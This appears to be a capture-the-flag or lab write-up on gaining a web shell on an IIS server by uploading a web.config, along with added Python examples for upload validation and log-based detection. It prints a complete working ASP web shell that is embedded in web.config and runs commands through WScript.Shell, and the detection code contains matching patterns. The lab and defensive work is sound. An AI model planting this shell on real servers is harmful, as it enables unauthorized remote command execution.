In this post I will show how to get a web shell on a Windows server by uploading a web.config file.

Attacking Environment

To demonstrate this, I have a vulnerable machine set up locally at IP 10.10.10.93.

This Windows machine hosts a web server on port 80. The web server exposes a file upload feature, which is what we exploit in this post.

Agenda

Our agenda for this post is to abuse the file upload feature of the web server to upload a web shell. We do so by uploading a web.config file.

Hacking Windows server

To begin with, the web server offers a file upload feature.

We tried to upload our .aspx shell normally through the file upload feature on the web server, but it failed. We also tried some well-known tricks and techniques to bypass the file restrictions, but nothing worked.

At last we tried to upload a web.config file, and it worked. If you are not aware of what a web.config file is, it is the main configuration file for ASP-based applications and stores all the settings and configuration for the web application. You may think of it as a plain XML file containing all the configuration for the web application. IIS applies a web.config found in any directory it serves, so a web.config placed in the upload folder changes the handler and request-filtering settings for that folder.

After uploading the web.config file we browsed to the location where the application stores the uploaded files. Here we see that the code in our web.config file is executed: it prints 3 on the screen.

Now that we know our code gets executed, let's turn it into a web shell. Paste the text below into the web.config file.

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

Function getCommandOutput(theCommand)

Dim objShell, objCmdExec
Set objShell = CreateObject("WScript.Shell")
Set objCmdExec = objshell.exec(thecommand)
getCommandOutput = objCmdExec.StdOut.ReadAll

end Function

%>

<HTML>
<BODY>
<FORM action="" method="GET">
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
<input type="submit" value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<%Response.Write(Request.ServerVariables("server_name"))%>
<p>
<b>The server's port:</b>
<%Response.Write(Request.ServerVariables("server_port"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("server_software"))%>
</p>
<p>
<b>The server's local address:</b>
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
<% szCMD = request("cmd")
thisDir = getCommandOutput("cmd /c" & szCMD)
Response.Write(thisDir)%>
</p>
<br>
</BODY>
</HTML>

We uploaded the web.config file given above to get our web shell.
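From the defender's side, the upload handler is the place this should have been stopped. The following is an added example, not code from the post or from the application on the target machine: a server-side review of an uploaded file that rejects IIS configuration filenames outright and, independently of the name, flags content carrying the three markers of the payload above (a handler mapping that sends *.config to a script processor, the <remove> elements that undo request filtering for .config and web.config, and an inline <% ... %> script block). It assumes the upload handler passes the client-supplied filename and raw bytes to review_upload() before anything is written under the web root; the sample payload at the bottom is constructed and only echoes a string.

```python
"""
Server-side review of an uploaded file, written to catch the web.config
technique described in the post. Added example, not the post's own code.
Assumption: the upload handler calls review_upload(filename, data) before
saving anything beneath the web root.
"""
import re
from dataclasses import dataclass, field
from typing import List

# IIS reads a web.config from any directory it serves, so the filename alone
# is grounds for rejection. The post only involves web.config, so the list
# stays at that name plus the .config extension.
RESERVED_NAMES = {"web.config"}
RESERVED_EXTENSIONS = {".config"}

# Content markers taken from the payload shown in the post.
HANDLER_RE = re.compile(r"<add\b[^>]*\bpath\s*=\s*[\"']\*?\.config[\"']", re.I)
UNHIDE_RE = re.compile(
    r"<remove\b[^>]*\b(fileExtension|segment)\s*=\s*[\"'](\.config|web\.config)[\"']",
    re.I)
SCRIPT_RE = re.compile(r"<%.*?%>", re.S)
CONFIG_RE = re.compile(r"<configuration\b", re.I)


@dataclass
class Verdict:
    allowed: bool
    reasons: List[str] = field(default_factory=list)


def normalize_name(filename: str) -> str:
    """Reduce a client-supplied path to a bare, lower-cased filename.
    Windows drops trailing dots and spaces when creating a file, so a
    name such as 'web.config ' is compared as 'web.config'."""
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]
    return name.strip().rstrip(". ").lower()


def review_upload(filename: str, data: bytes) -> Verdict:
    """Return a Verdict; allowed is False whenever a reason was recorded."""
    reasons: List[str] = []
    name = normalize_name(filename)
    if name in RESERVED_NAMES:
        reasons.append(f"reserved IIS configuration filename: {name}")
    elif "." in name and "." + name.rsplit(".", 1)[1] in RESERVED_EXTENSIONS:
        reasons.append(f"configuration extension: {name}")

    # Content checks run even when the name passed, so a renamed copy of
    # the same payload is still logged with a concrete reason.
    text = data.decode("utf-8", errors="replace")
    if CONFIG_RE.search(text):
        if HANDLER_RE.search(text):
            reasons.append("handler mapping sends *.config to a script processor")
        if UNHIDE_RE.search(text):
            reasons.append("request filtering for .config / web.config removed")
        if SCRIPT_RE.search(text):
            reasons.append("server-side script block embedded in configuration")
    return Verdict(allowed=not reasons, reasons=reasons)


# Constructed sample mirroring the structure of the post's payload; the
# script block here only writes a fixed string.
SAMPLE_PAYLOAD = b"""<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" />
</handlers>
<security><requestFiltering>
<fileExtensions><remove fileExtension=".config" /></fileExtensions>
<hiddenSegments><remove segment="web.config" /></hiddenSegments>
</requestFiltering></security>
</system.webServer>
</configuration>
<% Response.Write("test") %>
"""

if __name__ == "__main__":
    for fname, body in [("web.config", SAMPLE_PAYLOAD),
                        ("photo.png", b"\x89PNG\r\n\x1a\n")]:
        v = review_upload(fname, body)
        print(fname, "allowed" if v.allowed else "rejected", v.reasons)
```

The name check is the hard stop; the content markers exist so that the log entry says why a file was refused and so that a copy uploaded under a harmless name still leaves a trace. Locking the handlers and requestFiltering sections in applicationHost.config so that they cannot be overridden per directory is the complementary IIS-side control.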

Now that we have a web shell on the machine, let's run whoami.

As you can see, I am the user merlin on this machine, which is named bounty.

That's it for this post. We have access to the machine and can now run commands on it as that user.
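On the monitoring side, the access pattern this post produces is easy to pick out of the IIS W3C logs: a request for web.config (or any *.config) under a served directory that is answered with 200. IIS request filtering denies such requests by default, which is exactly why the uploaded file removes the .config extension from fileExtensions and web.config from hiddenSegments, so a 200 on a config path is the signal, and a cmd= query on that path matches the form field of the shell above. The following is an added example, not the post's code. The log lines are constructed: the server address 10.10.10.93 is from the post, while the upload path /uploadedfiles/, the client addresses and the timestamps are placeholders.

```python
"""
Detection over IIS W3C extended log lines for served configuration files.
Added example, not the post's code. SAMPLE_LOG is constructed: only the
server address 10.10.10.93 comes from the post.
"""
from dataclasses import dataclass
from typing import Dict, Iterable, Iterator, List

SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2024-01-01 10:00:01 10.10.10.93 GET /index.aspx - 80 - 10.10.14.5 Mozilla/5.0 200 0 0 15
2024-01-01 10:00:05 10.10.10.93 POST /upload.aspx - 80 - 10.10.14.5 Mozilla/5.0 200 0 0 40
2024-01-01 10:00:09 10.10.10.93 GET /uploadedfiles/web.config - 80 - 10.10.14.5 Mozilla/5.0 200 0 0 22
2024-01-01 10:00:20 10.10.10.93 GET /uploadedfiles/web.config cmd=whoami 80 - 10.10.14.5 Mozilla/5.0 200 0 0 310
2024-01-01 10:01:00 10.10.10.93 GET /web.config - 80 - 10.10.14.9 curl/8.0 404 8 0 3
"""


@dataclass
class Alert:
    severity: str
    time: str
    client: str
    uri: str
    detail: str


def parse_w3c(lines: Iterable[str]) -> Iterator[Dict[str, str]]:
    """Yield one dict per log record, keyed by the names in the #Fields line.
    W3C values are URL-encoded, so a plain whitespace split is safe."""
    fields: List[str] = []
    for raw in lines:
        line = raw.rstrip("\n")
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or not fields:
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed or truncated record; skip rather than guess
        yield dict(zip(fields, values))


def is_config_stem(stem: str) -> bool:
    """True when the last path segment is web.config or any *.config."""
    last = stem.lower().rsplit("/", 1)[-1]
    return last == "web.config" or last.endswith(".config")


def detect_config_access(lines: Iterable[str]) -> List[Alert]:
    """Raise an alert for every request that targets a configuration file.
    A 200 means request filtering no longer hides the file; a cmd= query on
    top of that matches the form field of the shell described in the post."""
    alerts: List[Alert] = []
    for rec in parse_w3c(lines):
        stem = rec["cs-uri-stem"]
        if not is_config_stem(stem):
            continue
        status, query, client = rec["sc-status"], rec["cs-uri-query"], rec["c-ip"]
        when = f'{rec["date"]} {rec["time"]}'
        if status == "200" and "cmd=" in query.lower():
            alerts.append(Alert("critical", when, client, stem,
                                f"command parameter sent to served config: {query}"))
        elif status == "200":
            alerts.append(Alert("high", when, client, stem,
                                "config file served with 200; request filtering not in effect"))
        else:
            alerts.append(Alert("low", when, client, stem,
                                f"config request denied ({status}.{rec['sc-substatus']})"))
    return alerts


if __name__ == "__main__":
    for a in detect_config_access(SAMPLE_LOG.splitlines()):
        print(f"[{a.severity}] {a.time} {a.client} {a.uri}: {a.detail}")
```

The low-severity branch is deliberately kept: a denied request for web.config is what a healthy server logs, and a sudden change from those 404s to 200s for the same path is the moment the uploaded file took effect.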
